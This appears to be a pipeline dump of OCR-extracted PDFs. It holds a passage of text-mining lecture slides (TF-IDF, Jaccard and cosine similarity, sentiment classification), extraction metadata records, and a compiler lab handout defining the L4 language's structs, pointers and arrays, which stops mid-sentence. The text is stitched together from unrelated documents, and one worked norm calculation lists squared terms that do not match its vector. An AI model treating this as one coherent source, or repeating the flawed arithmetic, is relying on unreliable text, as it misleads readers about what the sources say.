1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 10 | | Σ | 48 | 204| 34 | 39 | 46 | 219| 219| 73 | 161| 180| 208| 57 | 61 | 54 | 56 | 68 | 89 | 44 | 147| 32 | 2039 | Feature Generation - Document is treated as a **bag of words** (or terms) - each word or term becomes a feature. - order of words/terms is ignored. - Each document is represented by a vector. - Different techniques for vector creation: 1. **Binary Term Occurrence**: Boolean attributes describe whether or not a term appears in the document. 2. **Term Occurrence**: Number of occurrences of a term in the document (problematic if documents have different length). 3. **Terms Frequency**: Attributes represent the frequency in which a term appears in the document (number of occurrences / number of words in document) 4. **TF-IDF**: see next slide The TF-IDF Term Weighting Scheme - The TF-IDF weight (term frequency–inverse document frequency) is used to evaluate how important a word is to a corpus of documents. - TF: Term Frequency (see last slide) - IDF: Inverse Document Frequency. \[ w_{ij} = tf_{ij} \times idf_i \] \[ idf_i = \log \frac{N}{df_i} \] - Gives more weight to rare words. - Give less weight to common words (domain-specific “stopwords”). Feature Generation in RapidMiner 1. Specify files to process 2. Select feature generation method 4. Feature Selection - Not all features help! - Learners might have difficulty with high dimensional data. Pruning Document Vectors in RapidMiner - Prune methods - specify if and how too frequent or too infrequent words should be ignored. - Different options: - Percentual - ignore words that appear in less / more than this percentage of all documents. - Absolute - ignore words that appear in less / more than that many documents. - By Rank - specifies how many percent of the most frequent / infrequent words are ignored. - POS tagging may be helpful for feature selection. - sometimes you want to focus on certain classes of words: - Adjectives (JJ.) for sentiment analysis - good, bad, great - Nouns (N.) for text clustering - red and blue cars are similar - red and blue trousers are similar - Rapidminer supports - PENN tag system for English - STTS tag system for German - filtering conditions are expressed as regular expressions 5. Pattern Discovery Methods: 1. Cluster Analysis 2. Classification 3. Association Analysis 5.1 Document Clustering Goal - Given a set of documents and a similarity measure among documents find clusters such that - documents in one cluster are more similar to one another - documents in separate clusters are less similar to one another - using some clustering algorithm. Applications - Topical clustering of news stories - Email message thread identification - Grouping of document versions Question - Which similarity measures are a good choice for comparing document vectors? The Jaccard coefficient is a popular similarity measure for vectors consisting of asymmetric binary attributes. \[ dist(x_i, x_j) = \frac{M_{11}}{M_{01} + M_{10} + M_{11}} \] Number of 11 matches / number of not-both-zero attributes values Binary term occurrence vector - 1 represents occurrence of specific word - 0 represents absence of specific word ### Example: Jaccard Coefficient - **Example document set** - d1 = “Saturn is the gas planet with rings.” - d2 = “Jupiter is the largest gas planet.” - d3 = “Saturn is the Roman god of sowing.” - **Documents as binary term occurrence vectors** <table> <thead> <tr> <th></th> <th>Saturn</th> <th>is</th> <th>the</th> <th>gas</th> <th>planet</th> <th>with</th> <th>rings</th> <th>Jupiter</th> <th>largest</th> <th>Roman</th> <th>god</th> <th>of</th> <th>sowing</th> </tr> </thead> <tbody> <tr> <td>d1</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>d2</td> <td>0</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>d3</td> <td>1</td> <td>1</td> <td>1</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>1</td> <td>1</td> <td>1</td> <td>1</td> </tr> </tbody> </table> - **Jaccard similarities between the documents** - \( \text{sim}(d_1,d_2) = 0.44 \) - \( \text{sim}(d_1,d_3) = 0.27 \) - \( \text{sim}(d_2,d_3) = 0.18 \) Cosine Similarity - Popular similarity measure for comparing weighted document vectors such as term-frequency or TF-IDF vectors. \[ \cos(d_1, d_2) = \frac{d_1 \cdot d_2}{\|d_1\| \|d_2\|} \] where \( \cdot \) indicates vector dot product and \( \|d\| \) is the length of vector \( d \). - Example \[d_1 = 3\ 2\ 0\ 5\ 0\ 0\ 0\ 2\ 0\ 0\] \[d_2 = 1\ 0\ 0\ 0\ 0\ 0\ 0\ 1\ 0\ 2\] \[d_1 \cdot d_2 = 3*1 + 2*0 + 0*0 + 5*0 + 0*0 + 0*0 + 0*0 + 2*1 + 0*0 + 0*2 = 5\] \[\|d_1\| = (3^2 + 2^2 + 0^2 + 0^2 + 5^2 + 0^2 + 0^2 + 0^2 + 1^2 + 0^2 + 0^2)^{0.5} = (42)^{0.5} = 6.481\] \[\|d_2\| = (1^2 + 0^2 + 0^2 + 0^2 + 0^2 + 0^2 + 0^2 + 0^2 + 1^2 + 0^2 + 2^2)^{0.5} = (6)^{0.5} = 2.245\] \[\cos(d_1, d_2) = 0.3150\] Example: Cosine Similarity and TF-IDF - A commonly used combination for text clustering. - Each document is represented by vectors of TF-IDF weights. - Sample document set: - “Saturn is the gas planet with rings.” - “Jupiter is the largest gas planet.” - “Saturn is the Roman god of sowing.” - First document as TF-IDF vector: \[ (1/7 \times \log(3/2), 1/7\times\log(3/3), 1/7\times\log(3/3), \ldots, 0, 0, 0, \ldots) \] \[ w_{ij} = tf_{ij} \times idf_i. \] \[ idf_i = \log \frac{N}{df_i} \] Example: Cosine Similarity and TF-IDF - Sample document set - d1 = “Saturn is the gas planet with rings.” - d2 = “Jupiter is the largest gas planet.” - d3 = “Saturn is the Roman god of sowing.” - Documents as TF-IDF vectors <table> <thead> <tr> <th></th> <th>Saturn</th> <th>is</th> <th>the</th> <th>gas</th> <th>planet</th> <th>with</th> <th>rings</th> <th>Jupiter</th> <th>largest</th> <th>Roman</th> <th>god</th> <th>of</th> <th>sowing</th> </tr> </thead> <tbody> <tr> <td>d1</td> <td>0.03</td> <td>0</td> <td>0</td> <td>0.03</td> <td>0.03</td> <td>0.07</td> <td>0.07</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>d2</td> <td>0</td> <td>0</td> <td>0</td> <td>0.03</td> <td>0.03</td> <td>0</td> <td>0</td> <td>0.08</td> <td>0.08</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> </tr> <tr> <td>d3</td> <td>0.03</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0</td> <td>0.07</td> <td>0.07</td> <td>0.07</td> <td>0.07</td> </tr> </tbody> </table> - Cosine similarities between the documents - $\cos(d1,d2) = 0.13$ - $\cos(d1,d3) = 0.05$ - $\cos(d2,d3) = 0.00$ 5.2 Document Classification - Given: A collection of labeled documents (training set). - Find: A model for the class as a function of the values of the features. - Goal: Previously unseen documents should be assigned a class as accurately as possible. - Applications - Topical classification of news stories or web pages - SPAM detection - Sentiment analysis - Classification methods commonly used for text 1. Naive Bayes 2. Support Vector Machines 3. but KNN or decision trees may also work Example Application: Sentiment Analysis - Given: A text - Goal: Assign a class of sentiment to the text - e.g., positive, neutral, negative - e.g., sad, happy, angry, surprised - Can be implemented as supervised classification task - requires training data - i.e., pairs like <text; sentiment> Example Application: Sentiment Analysis - Labeling data for sentiment analysis - is expensive, like every data labeling task - Reviews from the Web may be used as labeled data. - There exist various large corpora of reviews for public download - Amazon Product Data by Julian McAuley: 142 million reviews from Amazon - WebDataCommons: 70 million reviews from 50,000 websites that use RDFa or Microdata markup Preprocessing for Sentiment Analysis - Recap – we started our processing with: Simple Syntactic Analysis • Text Cleanup (remove punctuation, HTML tags, …) • Normalize case • … - However, reasonable features for sentiment analysis might include • punctuation: use of “!”“, “?”“, “?!” • smileys (usually encoded using punctuation: ;-) ) • use of visual markup, where available (red color, bold face, …) • amount of capitalization (“screaming”) Text Classification Tricks - Finding selective words - weight words according to their correlation with label - select top-k words with highest correlation - Sentiment lexicons - use external dictionary of opinion words - Bing Liu’s List http://www.cs.uic.edu/~liub/FBS/opinion-lexicon-English.rar - restrict Rapidminer word list to these words Summary - **Main challenge in text mining: Preprocessing of text** - in order to be able to apply well known Data Mining algorithms. - **There are lots of alternative preprocessing techniques** - thus you need to experiment in order to find out which work well for your use case. - **Text mining can be tricky, but “ok”-ish results are easily achieved.** Next Week: Introduction to Student Projects - **EVERY** student needs to attend the lecture next week (18.04.2018) or - inform me via email **BEFORE** the lecture - why she/he cannot attend and - if she/he already has a group or wants to get assigned to a group - If you do not attend and do not send a mail, you will be **DELETED** from the participants list. References for this Slideset - **Survey Article** - Horto et al: A Brief Survey of Text Mining - **Videos** - Text Mining with RapidMiner by Vancouver Data - DWS Screencast: Text Mining with RapidMiner by Robert Meusel - **Additional Tools** - Stanford NLP: Collection of open-source NLP tools - GATE: Feature rich open-source text processing toolkit - **Additional DWS lectures covering Text Mining** - Text Analytics by Simone Ponzetto - Web Mining by Simone Ponzetto and Goran Glavaš (more on sentiment analysis)
{"Source-Url": "http://dws.informatik.uni-mannheim.de/fileadmin/lehrstuehle/ki/Lehre/DataMining1/FSS2018/DM05-Text-Mining-FSS2018.pdf", "len_cl100k_base": 7378, "olmocr-version": "0.1.53", "pdf-total-pages": 41, "total-fallback-pages": 0, "total-input-tokens": 53856, "total-output-tokens": 8803, "length": "2e12", "weborganizer": {"__label__adult": 0.0005064010620117188, "__label__art_design": 0.0011348724365234375, "__label__crime_law": 0.0013666152954101562, "__label__education_jobs": 0.03192138671875, "__label__entertainment": 0.00033783912658691406, "__label__fashion_beauty": 0.0003352165222167969, "__label__finance_business": 0.0017824172973632812, "__label__food_dining": 0.00039768218994140625, "__label__games": 0.0013027191162109375, "__label__hardware": 0.0013151168823242188, "__label__health": 0.0007381439208984375, "__label__history": 0.0005464553833007812, "__label__home_hobbies": 0.0003445148468017578, "__label__industrial": 0.001468658447265625, "__label__literature": 0.0026149749755859375, "__label__politics": 0.000728607177734375, "__label__religion": 0.0007386207580566406, "__label__science_tech": 0.368896484375, "__label__social_life": 0.0005927085876464844, "__label__software": 0.1636962890625, "__label__software_dev": 0.41796875, "__label__sports_fitness": 0.00043487548828125, "__label__transportation": 0.0004270076751708984, "__label__travel": 0.0002267360687255859}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20548, 0.03449]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20548, 0.38085]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20548, 0.86857]], "google_gemma-3-12b-it_contains_pii": [[0, 27, false], [27, 144, null], [144, 403, null], [403, 526, null], [526, 765, null], [765, 815, null], [815, 1193, null], [1193, 1399, null], [1399, 1907, null], [1907, 2091, null], [2091, 2344, null], [2344, 2430, null], [2430, 2987, null], [2987, 3543, null], [3543, 6345, null], [6345, 6724, null], [6724, 7210, null], [7210, 7330, null], [7330, 7495, null], [7495, 11018, null], [11018, 11678, null], [11678, 12113, null], [12113, 12211, null], [12211, 12319, null], [12319, 12772, null], [12772, 13208, null], [13208, 13301, null], [13301, 13798, null], [13798, 14155, null], [14155, 15104, null], [15104, 15808, null], [15808, 16334, null], [16334, 17228, null], [17228, 17735, null], [17735, 18040, null], [18040, 18458, null], [18458, 18918, null], [18918, 19279, null], [19279, 19641, null], [19641, 20015, null], [20015, 20548, null]], "google_gemma-3-12b-it_is_public_document": [[0, 27, true], [27, 144, null], [144, 403, null], [403, 526, null], [526, 765, null], [765, 815, null], [815, 1193, null], [1193, 1399, null], [1399, 1907, null], [1907, 2091, null], [2091, 2344, null], [2344, 2430, null], [2430, 2987, null], [2987, 3543, null], [3543, 6345, null], [6345, 6724, null], [6724, 7210, null], [7210, 7330, null], [7330, 7495, null], [7495, 11018, null], [11018, 11678, null], [11678, 12113, null], [12113, 12211, null], [12211, 12319, null], [12319, 12772, null], [12772, 13208, null], [13208, 13301, null], [13301, 13798, null], [13798, 14155, null], [14155, 15104, null], [15104, 15808, null], [15808, 16334, null], [16334, 17228, null], [17228, 17735, null], [17735, 18040, null], [18040, 18458, null], [18458, 18918, null], [18918, 19279, null], [19279, 19641, null], [19641, 20015, null], [20015, 20548, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20548, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20548, null]], "pdf_page_numbers": [[0, 27, 1], [27, 144, 2], [144, 403, 3], [403, 526, 4], [526, 765, 5], [765, 815, 6], [815, 1193, 7], [1193, 1399, 8], [1399, 1907, 9], [1907, 2091, 10], [2091, 2344, 11], [2344, 2430, 12], [2430, 2987, 13], [2987, 3543, 14], [3543, 6345, 15], [6345, 6724, 16], [6724, 7210, 17], [7210, 7330, 18], [7330, 7495, 19], [7495, 11018, 20], [11018, 11678, 21], [11678, 12113, 22], [12113, 12211, 23], [12211, 12319, 24], [12319, 12772, 25], [12772, 13208, 26], [13208, 13301, 27], [13301, 13798, 28], [13798, 14155, 29], [14155, 15104, 30], [15104, 15808, 31], [15808, 16334, 32], [16334, 17228, 33], [17228, 17735, 34], [17735, 18040, 35], [18040, 18458, 36], [18458, 18918, 37], [18918, 19279, 38], [19279, 19641, 39], [19641, 20015, 40], [20015, 20548, 41]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20548, 0.1105]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
34de7be8a6ca2db850c68f79c2eabc3a6e119c6d
[REMOVED]
{"Source-Url": "http://staff.um.edu.mt/cabe2/lectures/webscience/docs/polovina_07.pdf", "len_cl100k_base": 6218, "olmocr-version": "0.1.50", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 26322, "total-output-tokens": 7460, "length": "2e12", "weborganizer": {"__label__adult": 0.0004682540893554687, "__label__art_design": 0.0020294189453125, "__label__crime_law": 0.0006566047668457031, "__label__education_jobs": 0.00933074951171875, "__label__entertainment": 0.0002961158752441406, "__label__fashion_beauty": 0.00032067298889160156, "__label__finance_business": 0.0011091232299804688, "__label__food_dining": 0.0005893707275390625, "__label__games": 0.0008711814880371094, "__label__hardware": 0.0007991790771484375, "__label__health": 0.0009183883666992188, "__label__history": 0.0006647109985351562, "__label__home_hobbies": 0.000263214111328125, "__label__industrial": 0.0008459091186523438, "__label__literature": 0.0038394927978515625, "__label__politics": 0.00047707557678222656, "__label__religion": 0.0008535385131835938, "__label__science_tech": 0.435791015625, "__label__social_life": 0.0004570484161376953, "__label__software": 0.0245361328125, "__label__software_dev": 0.513671875, "__label__sports_fitness": 0.00027680397033691406, "__label__transportation": 0.0008378028869628906, "__label__travel": 0.0002262592315673828}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26523, 0.01499]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26523, 0.71637]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26523, 0.902]], "google_gemma-3-12b-it_contains_pii": [[0, 2485, false], [2485, 5017, null], [5017, 7458, null], [7458, 9266, null], [9266, 10287, null], [10287, 11882, null], [11882, 13804, null], [13804, 16504, null], [16504, 18645, null], [18645, 19504, null], [19504, 21465, null], [21465, 22481, null], [22481, 25282, null], [25282, 26523, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2485, true], [2485, 5017, null], [5017, 7458, null], [7458, 9266, null], [9266, 10287, null], [10287, 11882, null], [11882, 13804, null], [13804, 16504, null], [16504, 18645, null], [18645, 19504, null], [19504, 21465, null], [21465, 22481, null], [22481, 25282, null], [25282, 26523, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26523, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26523, null]], "pdf_page_numbers": [[0, 2485, 1], [2485, 5017, 2], [5017, 7458, 3], [7458, 9266, 4], [9266, 10287, 5], [10287, 11882, 6], [11882, 13804, 7], [13804, 16504, 8], [16504, 18645, 9], [18645, 19504, 10], [19504, 21465, 11], [21465, 22481, 12], [22481, 25282, 13], [25282, 26523, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26523, 0.0]]}
olmocr_science_pdfs
2024-12-03
2024-12-03
3745032be2e7ecad7322abb963b656b08e7ab7b7
1 Introduction The goal of the lab is to implement a complete compiler for the language $L_4$. This language extends $L_3$ by structs (in the sense of C), pointers, and arrays. This means the main change from the third lab is that you will have to deal with memory references. Because pointers on the x86-64 architecture are 64 bits wide, this also means you will have to deal with differently sized data. Again, performance of both the compiler and the compiled code are only minor considerations at this stage. However, the threshold for compilation time will be slightly tighter, so you may need to start to pay attention to some performance issues. 2 Requirements As for Labs 1, 2, and 3, you are required to hand in test programs as well as a complete working compiler that translates $L_4$ source programs into correct target programs written in x86-64 assembly language. When encountering an error in the input program (which can be a lexical, grammatical, or static semantics error) the compiler should terminate with a non-zero exit code and print a helpful error message. To test the target programs, we will assemble and link them using gcc on the lab machines and run them under fixed but generous time limits. 3 $L_4$ Syntax The syntax of $L_4$ is defined by the context-free grammar in Figure 1. This is an extension of the grammar for $L_3$ in the sense that a correct $L_3$ program should still parse correctly if it does not use any of the new keywords. Ambiguities in this grammar are resolved according to the operator precedence table in Figure 2 and the rule that an else provides the alternative for the most recent eligible if. Comments are as in $L_3$. The precedence of unary and binary operators is given in Figure 2. Non-terminals are in ⟨angle brackets⟩, optional constituents in [brackets]. Terminals are in bold. Figure 1: Grammar of L4 4 L4 Runtime Objects The L4 language has four kinds of identifiers: those standing for functions (g), those standing for variables (x), those standing for structs (s), and those standing for field names (f). These are in separate name spaces, so a function, a variable, a struct, and a field may have the same name without conflict. Reserved words of the grammar (extern, struct, var, int, if, else, while, for, continue, break, return, NULL, new) cannot be used as any kind of name. The L4 language has some complexity in its new constructs, dealing with memory (structs, pointers, and arrays). In order to describe these concisely we use an abstract syntax notation. Eliding some expressions which are as in L3: \[ \begin{align*} \text{Types} & : \quad \tau ::= \text{int} \mid s \mid \tau^* \mid \tau[] \\ \text{Expressions} & : \quad e ::= c \mid \text{null} \mid x \mid *e \mid e.f \mid e[e] \mid e\rightarrow e \mid \text{new}\tau \mid \text{new}\tau[e] \mid \cdots \end{align*} \] We also have to consider the runtime objects created during the execution of a program. We divide these into two classes: small values and large values. Small values can be held in registers, large values must be in memory. We use a for an address of an object in memory and n for an integer. \[ \begin{align*} \text{Small Values} & : \quad w ::= a \mid n \\ \text{Large Values} & : \quad W ::= \{f_1=v_1; \ldots f_n=v_n;\} \mid [v_0, \ldots, v_{n-1}] \\ \text{Values} & : \quad V ::= w \mid W \end{align*} \] The first kind of large value is a struct with fields \( f_1, \ldots, f_n \), the second an array with \( n \) elements. On occasion, we need to know the exact size of objects of a given type, \(|\tau|\). We compute this as follows from the type: \[ |\text{int}| = 4 \\ |\tau*| = 8 \\ |\tau[\| = 8 \\ |s| = |f_1:\tau_1; \ldots f_n:\tau_n;| \] The size of a struct, written here as \(|f_1:\tau_1; \ldots f_n:\tau_n;|\) is computed by traversing the fields from left to right, adding padding as necessary so that alignment restrictions on the fields are satisfied. \textbf{int}'s are aligned at 0 mod 4, small values of type \( \tau* \) and \( \tau[\] are aligned at 0 mod 8, and structs are aligned according to their most strictly aligned field. Padding may need to be added at the end of a struct so that its total size is a multiple of its most strictly aligned field. Arrays \([V_0, \ldots, V_{n-1}]\) cannot be directly embedded in a struct or other array, since their size is unknown at compile time. This is the reason that a value of type \( \tau[\] \) is \textit{small}: it is merely the starting address of the array in memory. Arrays must be aligned according to the requirement of their elements. The start of an array is returned by a call to the \textbf{malloc} or \textbf{calloc} library function which guarantees an address 0 mod 8, which is the strictest alignment required in our language. Addresses are represented as 8 byte (unsigned) integers in the machine. They are obtained from the runtime system which allocates new memory, or by addition (address arithmetic). There is a special address 0 which is never returned by the runtime system and will be used to denote the null pointer. Memory access is represented as \( M[a] \), which reads from memory when used as a value and writes to memory when used on the left-hand side of an assignment \( M[a] \leftarrow w \). The number of bytes read or written depends on the size of the small value \( w \). Along similar lines, we write \( V[x] \) for the value of a variable \( x \). On the left hand side \( V[x] \leftarrow w \) assigns to \( x \); on the right hand side \( V[x] \) denotes the current value of \( x \). The most important judgments we make are typing, written \( e: \tau \), and evaluation, written \( e \Rightarrow w \). The first is part of the \textit{static semantics}, which must satisfy some additional conditions that are stated informally. The latter constitutes the \textit{dynamic semantics}, but is also only partially formal since evaluating expressions has effects that we only describe informally. As a general convention, expressions must be evaluated from left to right so that any side effects happen in a deterministic order. We now present both the static and dynamic semantics for each new construct (structs, pointers, arrays) in turn. \textbf{Structs} Statically, several properties must be checked for struct declarations. - Every type identifier \( s \) used in a struct declaration or function must be declared with an explicit \textbf{struct} \( s \{ \ldots \}; \) somewhere in the file. The order of \textbf{struct} declarations is irrelevant, but the syntax restricts the file so that they can be mixed with \textbf{extern} declarations but must precede all function definitions. - All struct declarations in a file must have distinct names \( s \). • Field names in a struct declaration must all be distinct. However, different struct declarations may reuse field names. • Fields of structs can refer to other structs which can in turn refer to other structs and so on. However, any circular reference from a struct to itself following such a chain must go through a pointer or array type. The main expression construct for structs is $e.f$. It is easily type-checked. $$ \frac{e : s\; \textbf{struct} s \{ \ldots f : \tau ; \ldots \}}{e.f : \tau} $$ We write $\text{offset}(s, f)$ for the offset of field $f$ is structure $s$, in bytes. We suggest to compute this information early and store it in a table so that the compiler can access it easily. The evaluation rule is slightly tricky, and carries a recurring theme. In several circumstances evaluating an expression yields an address of some object in memory. When this object is small, we can return it directly as a small value for further computation. When the object is large, we cannot directly operate on the object, but must return its address instead. $$ e.f \Rightarrow M[a + k] \quad \text{if } e \Rightarrow a \text{ and } \text{offset}(s, f) = k $$ $$ \Rightarrow a + k \quad \text{as above, except that } \tau \text{ large} $$ We also have the derived form $e \rightarrow f$, which can be desugared into $(\ast e).f$. **Pointers** The typing for pointer operations are straightforward. $$ \frac{e : \tau^*}{\ast e : \tau} \quad \frac{\textbf{new } \tau : \tau^*}{\textbf{null} : \tau^*} $$ Unfortunately, the typing of the null pointer present a challenge, since it potentially has infinitely many types. This is necessary so that expressions such as $p == \textbf{NULL}$ or statements such as $p->f = \textbf{NULL}$ where the left-hand side has some type $\tau^*$ are all well-typed. We suggest to create a new type any used only internally. In key places during type-checking where some types are required to be equal, we can allow any on either side or both sides. In programming language terms we say that null is polymorphic; fortunately it is the only polymorphic construct in the language so you can still implement a relatively simple type checker. The main places where type comparisons take place is in compiling equality ($==$), disequality ($!=$), assignments, and function calls. To avoid pathologies in type-checking, we disallow $\ast \textbf{null}$ because it type is ambiguous and may not be resolved by context. You can still reliably dereference the null pointer, should you be so inclined, for example with $\textbf{var } \textbf{null} : \textbf{int}^*; \textbf{null} = \textbf{NULL}; \ast \textbf{null};$ Assume a function $g$ has prototype $$ \tau g(x_1 : \tau_1, \ldots, x_n : \tau_n); $$ Then we have \[ \begin{array}{c} e_i : \tau_i \ (1 \leq i \leq n) \\ g(e_1, \ldots, e_n) : \tau \\ e : \tau \quad \text{(return in body of } g) \\ \hline \text{return } e \ \text{valid} \end{array} \] where \textit{s valid} indicates that the statement \textit{s} is valid. The operational semantics for \( *e \) evaluates \( e \) to an address and then returns the memory contents at that address. Dereferencing the null pointer must raise the \textit{SIGSEGV} exception. In an implementation this can be accomplished without any checks, because the operating system will prevent read access to address 0 and raise the appropriate exception. - \texttt{null} \: \Rightarrow \: 0 - \( *e \) \: \Rightarrow \: M[a] \quad \text{if } e \Rightarrow a \text{ with } a \neq 0, \: e : \tau* \text{ and } \tau \text{ small} - \Rightarrow \: a \quad \text{as above, except that } \tau \text{ large} - \texttt{new } \tau \: \Rightarrow \: a \quad \text{where } M[a], \ldots, M[a + |\tau| - 1] \text{ are freshly allocated locations} The values stored in freshly allocated location must be all 0. This can be achieved with \texttt{calloc()} and means that values of type \texttt{int} are simply 0, values of type \( \tau* \) are null pointers, all fields of structs are recursively set to 0, and values of array type have address 0 which is akin to a null array reference. \textbf{Arrays} Arrays are similar to pointers. \[ \begin{array}{ccc} e_1 : \tau[\ ] & e_2 : \texttt{int} & e : \texttt{int} \\ e_1[e_2] : \tau & \texttt{new } \tau[e] : \tau[\ ] \end{array} \] \[ e_1[e_2] \: \Rightarrow \: M[a + n|\tau|] \quad \text{if } e_1 \Rightarrow a \text{ and } e_2 \Rightarrow n \text{ with } e_1 : \tau[\ ], \: \tau \text{ small} \] \[ \Rightarrow \: a + n|\tau| \quad \text{as above, except that } \tau \text{ large} \] \[ \linebreak[1] \texttt{new } \tau[e] \: \Rightarrow \: a \quad \text{if } e \Rightarrow n \text{ and } M[a], \ldots, M[a + (n - 1)|\tau|] \text{ are freshly allocated} \] Values in a freshly allocated array are all initialized to 0, as for pointers. The value of an out-of-bounds array access is \textit{undefined} in this version of the language. \textbf{Assignment} Assignment is now more general, because the left-hand side need not be a variable, but could be a more complicated expression so we can write, for example, \( *p = *q \) to copy the contents of \( q \) to the location denoted by \( p \). The left-hand side of an assignment must be a so-called \textit{lvalue} ("left value"), which is a certain kind of expression. We define lvalues, assuming that the expression is already known to be well-typed. \[ \text{Lvalues } v ::= x \mid *e \mid e.f \mid e_1[e_2] \] For an assignment to be a valid statement, the lvalue on the left-hand side must have a small type. \[ \frac{v : \tau \quad e : \tau \quad \tau \text{ small}}{v = e \text{ valid}} \] We also have a new statement which is just an expression \( e \) which is evaluated for possible effects. \( e \) is also required to have small type and its computed value is discarded so that it can be seen as shorthand for \( x = e \) where \( x \) is a fresh variable not used anywhere else. To show how assignment evaluates we use some notational slight of hand. \[ v = e \text{ has the effect of } V[x] \leftarrow w \] \[ \text{if } v \Rightarrow V[x] \text{ and } e \Rightarrow w \] \[ \text{has the effect of } M[a] \leftarrow w \] \[ \text{if } v \Rightarrow M[a] \text{ and } e \Rightarrow w \] Because we check that \( v \) is an lvalue and that the type of \( e \) is small, this should cover all possible cases. Note that \( v \) must be evaluated before \( e \). The meaning of complex assignment operators now also changes and is no longer a syntactic expansion because expressions can have side effects. An assignment \[ v \ op= e \] should execute as \[ V[x] \leftarrow V[x] \ op w \ \text{if } v \Rightarrow V[x] \text{ and } e \Rightarrow w \] \[ M[a] \leftarrow M[a] \ op w \ \text{if } v \Rightarrow M[a] \text{ and } e \Rightarrow w \] **Functions** Regarding functions, several properties must be checked. - Every function that is called must be declared somewhere in the file, either using `extern` or with a definition. The order of the functions in the file is irrelevant, but a function may not be declared more than once. - Functions must be called with the correct number of arguments of the correct type. - All function arguments and function results must be of small type. - Functions must terminate with an explicit `return` statement. This is checked by verifying that each finite control flow path originating at the top of a function ends in a `return` statement. See a more detailed explanation in the description of \( L2 \). - There must be a function `main()` which returns an integer as the result of the overall computation (and not an exit status). - Each `break` or `continue` statement must occur inside a `for` or `while` loop. Variables Regarding variables, we need to check three properties, the last of which is new for this language. • Every variable must be declared, either as a function parameter or an explicit local variable with a `var` declaration. Function parameters and local variables are local to a function and have nothing to do with parameters or local variables in other functions. Variables may not be redeclared, that is, names of parameters to a given function and its local variables must all be pairwise distinct. There are no global variables. • Each local variable must be defined by an assignment before it is used. This is checked by verifying that along all control flow paths originating at the beginning of the function, each local variable is assigned to before it is used. This ensures that there will be no references to uninitialized variables. A precise specification of this condition is given in Lab 2. • Any variable, either a function parameter or locally declared variable, must have a small type. Variables of large type are not permitted. This simplifies parameter passing considerably. The lack of bounds check and this language means that, unlike L3, there are programs in L4 whose result is not defined. Such programs are considered to be “erroneous”, although the compiler must permit them. For your test cases, you may not submit programs whose behavior is undefined. Overloaded Operators Equality (==) and disequality (!=) are overloaded, applying to both integers and pointers. See the discussion above on pointers. Operationally, the compiler will have to choose a 4 byte or 8 byte comparison for the two versions, which suggests after type-checking and during translation to intermediate code there should be two explicitly different operators. 5 Project Requirements For this project, you are required to hand in test cases and a complete working compiler for L4 that produces correct target programs written in Intel x86-64 assembly language. When we grade your work, we will use the gcc compiler to assemble and link the code you generate into executables using the provided runtime environment on the lab machines. Test Files Test files should have extension .l4 and start with one of the following lines ``` #test return i #test exception n #test error ``` followed by the program text. If an exception number is missing, any exception is accepted. Defined exceptions are at least SIGFPE (8), SIGSEGV (11), and SIGALRM (14). These are raised by division by 0 or division overflow (8), dereference of 0, stack overflow, or out-of-memory situations (11), or by 